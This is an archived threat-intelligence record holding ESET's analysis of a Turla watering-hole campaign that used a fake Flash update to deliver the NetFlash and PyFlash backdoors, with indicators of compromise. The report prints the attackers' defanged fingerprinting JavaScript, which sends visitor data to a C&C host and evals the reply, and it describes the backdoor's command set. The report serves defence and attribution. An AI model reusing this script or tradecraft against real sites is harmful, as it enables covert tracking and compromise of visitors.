{
	"id": "3d850a22-9d70-46ac-9f03-5eaafb83ffb6",
	"created_at": "2026-04-06T00:11:24.653879Z",
	"updated_at": "2026-04-10T03:33:35.88599Z",
	"deleted_at": null,
	"sha1_hash": "e93581b79d670bf7ec5fdcbdf5e1ed00f7981bc6",
	"title": "Tracking Turla: New backdoor delivered via Armenian watering holes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 500945,
	"plain_text": "Tracking Turla: New backdoor delivered via Armenian watering\r\nholes\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 23:12:34 UTC\r\nESET researchers found a watering hole (aka strategic web compromise) operation targeting several high-profile\r\nArmenian websites. It relies on a fake Adobe Flash update lure and delivers two previously undocumented pieces\r\nof malware we have dubbed NetFlash and PyFlash.\r\nVarious aspects of this campaign lead us to attribute this operation to Turla, an infamous espionage group active\r\nfor more than ten years. Its main targets include governmental and military organizations. We have previously\r\nreported multiple campaigns of this group including Mosquito and LightNeuron.\r\nThis recent operation bears similarities to several of Turla’s watering hole campaigns that we have tracked in the\r\npast years. In particular, the modus operandi is similar to a campaign we uncovered in 2017. The various pieces of\r\nJavaScript used there are almost identical to those in this campaign, but the targets and payloads are different.\r\nTargeted websites\r\nIn this specific operation, Turla has compromised at least four Armenian websites, including two belonging to the\r\ngovernment. Thus, it is likely the targets include government officials and politicians.\r\nAccording to ESET telemetry, the following websites were compromised:\r\narmconsul[.]ru: The consular Section of the Embassy of Armenia in Russia\r\nmnp.nkr[.]am: Ministry of Nature Protection and Natural Resources of the Republic of Artsakh\r\naiisa[.]am: The Armenian Institute of International and Security Affairs\r\nadgf[.]am: The Armenian Deposit Guarantee Fund\r\nWe have indications that these websites were compromised since at least the beginning of 2019. 
We notified the\r\nArmenian national CERT and shared our analysis with them before publication.\r\nTurla operators leveraged unknown access methods to these websites to insert a piece of malicious JavaScript\r\ncode. For example, for mnp.nkr[.]am, they appended obfuscated code at the end of jquery-migrate.min.js (a\r\ncommon JavaScript library), as shown in Figure 1.\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 1 of 10\n\nFigure 1. Obfuscated JavaScript code injected into the mnp.nkr[.]am website\r\n \r\nThis code loads an external JavaScript from skategirlchina[.]com/wp-includes/data_from_db_top.php. We analyze\r\nthis code in the next section.\r\nSince the end of November 2019, we noticed that skategirlchina[.]com was not delivering malicious scripts\r\nanymore. Thus, it is likely the Turla operators have suspended this watering hole operation.\r\nFingerprinting and malware delivery\r\nUpon visiting a compromised webpage, the second-stage malicious JavaScript is delivered by\r\nskategirlchina[.]com and fingerprints the visitor’s browser. Figure 2 shows the main function of this script.\r\nIf it is the first time the user’s browser executes the script, it will add an evercookie with a seemingly random\r\nMD5 value provided by the server, different at each execution of the script. The implementation of the evercookie\r\nis based on code available on GitHub. It uses multiple storage places such as the local database, local shared\r\nobjects (Flash cookies), Silverlight storage, etc., to store the cookie value. In comparison to a regular cookie, it\r\nwill be much more persistent as it won’t be deleted if the user just deletes the browser’s cookies.\r\nThis evercookie will be used to track whether the user visits one of the compromised websites again. 
When the\r\nuser comes back for a second time, the previously stored MD5 value will be used to identify them.\r\nThen, it collects several pieces of information including the browser plugin list, the screen resolution and various\r\noperating system information. This is sent to the C\u0026C server in a POST request. If there is a reply, it is assumed to\r\nbe JavaScript code and is executed using the eval function.\r\n[…]\r\nfunction f_ec(){\r\n var ec = new evercookie({domain:'http://skategirlchina[.]com/wp-includes/data_from_db_top.php',baseurl:'?htt\r\n ec.get(\"ec\", function(value) {\r\n if (value!=undefined){\r\n var jsonText = {'ec': ''+value+'',\r\n 'scp':screen.pixelDepth==undefined?''+0+'':''+screen.pixelDepth+'',\r\n 'scw':''+screen.width+'',\r\n 'sch':''+screen.height+'',\r\n 'bn':''+bn+'',\r\n 'bv':''+bv+'',\r\n 'bc':''+bc+'',\r\n 'osn':''+osn+'',\r\n 'osv':''+osv+'',\r\n 'osc':''+osc+'',\r\n 'adr':''+adr+'',\r\n 'pdr':''+pdr+'',\r\n 'fla':''+fla+'',\r\n 'jav':''+jav+'',\r\n 'wmp':''+wmp+'',\r\n 'msw':''+msw+'',\r\n 'qui':''+qui+'',\r\n 'sho':''+sho+'',\r\n 'type':'info',\r\n 'tiz': ''+(new Date().getTimezoneOffset()/60)+''\r\n };\r\n var json = JSON.stringify(jsonText);\r\n ajax({\r\n content_type : 'application/json',\r\n url: 'http://skategirlchina[.]com/wp-includes/data_from_db_top.php?http://skategirlchina[.]com/\r\n crossDomain: true,\r\n type: 'POST',\r\n data: json,\r\n onSuccess: function(m){\r\n eval(m);\r\n }\r\n });\r\n }\r\n else{\r\n ec.set('ec', '\u003credacted MD5 value\u003e');\r\n setTimeout(f_ec,1500);\r\n }\r\nFigure 2. Fingerprint script (malicious URLs defanged)\r\nIf the visitor is deemed interesting, the server replies with a piece of JavaScript code that creates an iframe. 
Data\r\nfrom ESET telemetry suggests that, for this campaign, only a very limited number of visitors were considered\r\ninteresting by Turla’s operators.\r\nThis iframe displays a fake Adobe Flash update warning to the user, shown in Figure 3, in order to trick them into\r\ndownloading a malicious Flash installer.\r\nFigure 3. Fake Adobe Flash update iframe\r\nWe did not observe the use of any browser vulnerabilities. The compromise attempt relies only on this social\r\nengineering trick. Once the malicious executable is downloaded from the same server as the iframe’s JavaScript,\r\nand if the user launches it manually, a Turla malware variant and a legitimate Adobe Flash program are installed.\r\nFigure 4 is an overview of the compromise process from initially visiting one of the compromised Armenian\r\nwebsites to the delivery of a malicious payload.\r\nFigure 4. Overview of the watering hole operation\r\nMalware\r\nOnce the user executes the fake installer, it will execute both a Turla malware variant and a legitimate Adobe\r\nFlash installer. Thus, the user is likely to believe that the update warning was legitimate.\r\nBefore September 2019: Skipper\r\nPrior to the end of August 2019, the victim would receive a RAR-SFX archive containing a legitimate Adobe\r\nFlash v14 installer and a second RAR-SFX archive. The latter contains the various components of a backdoor\r\nknown as Skipper that has been previously attributed to Turla. 
It was documented in 2017 by researchers from\r\nBitdefender, and a more recent version was documented by Telsy in May 2019.\r\nGiven that there are only minor changes between the documented versions and the most recent ones, we won’t\r\nprovide a detailed analysis here.\r\nOne interesting change is that the Skipper communication module uses the server that hosts this campaign’s\r\nremote JavaScripts and malicious binaries for its C\u0026C server, specifically skategirlchina[.]com/wp-includes/ms-locale.php.\r\nFrom September 2019: NetFlash and PyFlash\r\nAt the end of August 2019, we noticed that the payload delivered by skategirlchina[.]com changed.\r\nNetFlash (.NET downloader)\r\nThe new payload was a .NET application that dropped an installer for Adobe Flash v32 in %TEMP%\\adobe.exe,\r\nand NetFlash (a .NET downloader) in %TEMP%\\winhost.exe.\r\nAccording to their compilation timestamps, the malware samples were compiled at the end of August 2019 and at\r\nthe beginning of September 2019, right before being uploaded to the watering hole’s C\u0026C server.\r\nNetFlash downloads its second stage malware from a hardcoded URL and establishes persistence for this new\r\nbackdoor using a Windows scheduled task. Figure 5 shows the NetFlash function that downloads the second stage\r\nmalware, named PyFlash. We also encountered another NetFlash sample, likely compiled at the end of August\r\n2019, with a different hardcoded C\u0026C server: 134.209.222[.]206:15363.\r\nFigure 5. Main function of NetFlash\r\nPyFlash\r\nThis second stage backdoor is a py2exe executable. py2exe is a Python extension to convert a Python script into a\r\nstandalone Windows executable. To our knowledge, this is the first time the Turla developers have used the\r\nPython language in a backdoor.\r\nThe backdoor communicates with its hardcoded C\u0026C server via HTTP. 
The C\u0026C URL and other parameters such\r\nas the AES key and IV used to encrypt all network communications are specified at the beginning of the script, as\r\nshown in Figure 6.\r\nFigure 6. Global variables in the PyFlash Python script\r\nThe main function of the script, shown in Figure 7, sends information about the machine to the C\u0026C server. This\r\nis the output of the functions from the commands list seen in Figure 6. It includes OS-related commands\r\n(systeminfo, tasklist) and network-related commands (ipconfig, getmac, arp).\r\nFigure 7. Main function of PyFlash\r\nThe C\u0026C server can also send backdoor commands in JSON format. The commands implemented in this version\r\nof PyFlash are:\r\nDownload additional files from a given HTTP(S) link.\r\nExecute a Windows command using the Python function subprocess32.Popen.\r\nChange the execution delay: modifies the Windows task that regularly (every X minutes; 5 by default)\r\nlaunches the malware.\r\nKill (uninstall) the malware. To confirm this instruction the malware sends a POST request to the C\u0026C\r\nserver with the following string:\r\nI'm dying :(\r\nTell my wife that i love her...\r\nThen, the output of the command is sent back to the operators, encrypted with AES, via a POST request.\r\nConclusion\r\nTurla is still using watering hole attacks as one of its initial access tactics. Interestingly, this campaign relies on a\r\nwell-known social engineering trick – a fake Adobe Flash update warning – in order to induce the user to\r\ndownload and install malware.\r\nOn the other hand, the payload has changed, probably in order to evade detection, as Skipper has been known for\r\nmany years. 
They switched to NetFlash, which installs a backdoor we call PyFlash and that is developed in the\r\nPython language.\r\nWe will continue monitoring new Turla activities and will publish relevant information on our blog. For any\r\ninquiries, contact us at threatintel@eset.com. Indicators of Compromise can also be found on our GitHub\r\nrepository.\r\nIndicators of Compromise (IoCs)\r\nCompromised websites\r\nhttp://www.armconsul[.]ru/user/themes/ayeps/dist/js/bundle.0eb0f2cb2808b4b35a94.js\r\nhttp://mnp.nkr[.]am/wp-includes/js/jquery/jquery-migrate.min.js\r\nhttp://aiisa[.]am/js/chatem/js_rA9bo8_O3Pnw_5wJXExNhtkUMdfBYCifTJctEJ8C_Mg.js\r\nadgf[.]am\r\nC\u0026C servers\r\nhttp://skategirlchina[.]com/wp-includes/data_from_db_top.php\r\nhttp://skategirlchina[.]com/wp-includes/ms-locale.php\r\nhttp://37.59.60[.]199/2018/.config/adobe\r\nhttp://134.209.222[.]206:15363\r\nhttp://85.222.235[.]156:8000\r\nSamples\r\nSHA-1 | Timestamp | Description | ESET Detection Name\r\n973620A7AB28A2CBA82DC2A613CD24ED43734381 | Thu Aug 29 04:14:46 UTC 2019 | NetFlash Dropper | MSIL/Turla.D\r\nB6567F988C9ACC5DF3CBD72409FC70D54EA412BB | Tue Sep 3 11:12:04 UTC 2019 | NetFlash | MSIL/Turla.D\r\n9F81710B85AA7088505C1EECCE9DA94A39A2DC06 | Thu Aug 29 04:12:33 UTC 2019 | NetFlash | MSIL/Turla.F\r\n32430B11E42EDEB63A11E721927FFBABE7C9CFEA | N/A | PyFlash | Win32/Turla.EM\r\n620A669EC0451C9F079FB4731F254AC577902E5E | Wed Aug 29 09:43:18 UTC 2018 | Skipper communication DLL | Win32/Turla.EJ\r\nMITRE ATT\u0026CK techniques\r\nTactic | ID | Name | Description\r\nInitial Access | T1189 | Drive-by Compromise | Turla compromised high-value websites to deliver malware to the visitors.\r\nExecution | T1204 | User Execution | A fake Flash installer is intended to trick the user into launching the malware.\r\nPersistence | T1053 | Scheduled Task | NetFlash and PyFlash persist using scheduled tasks.\r\nDiscovery | T1016 | System Network Configuration Discovery | PyFlash executes ipconfig /all, getmac and arp -a\r\nDiscovery | T1057 | Process Discovery | PyFlash executes tasklist\r\nDiscovery | T1082 | System Information Discovery | PyFlash executes systeminfo\r\nCommand and Control | T1032 | Standard Cryptographic Protocol | PyFlash uses AES-128 in CBC mode to encrypt C\u0026C communications.\r\nCommand and Control | T1043 | Commonly Used Port | NetFlash uses port 80.\r\nCommand and Control | T1065 | Uncommonly Used Port | PyFlash uses port 8,000. A NetFlash sample uses port 15,363.\r\nCommand and Control | T1071 | Standard Application Layer Protocol | NetFlash and PyFlash use HTTP.\r\nExfiltration | T1041 | Exfiltration Over Command and Control Channel | The output of PyFlash surveillance and C\u0026C commands are exfiltrated using the C\u0026C protocol.\r\nSource: https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/"
	],
	"report_names": [
		"tracking-turla-new-backdoor-armenian-watering-holes"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434284,
	"ts_updated_at": 1775792015,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e93581b79d670bf7ec5fdcbdf5e1ed00f7981bc6.pdf",
		"text": "https://archive.orkl.eu/e93581b79d670bf7ec5fdcbdf5e1ed00f7981bc6.txt",
		"img": "https://archive.orkl.eu/e93581b79d670bf7ec5fdcbdf5e1ed00f7981bc6.jpg"
	}
}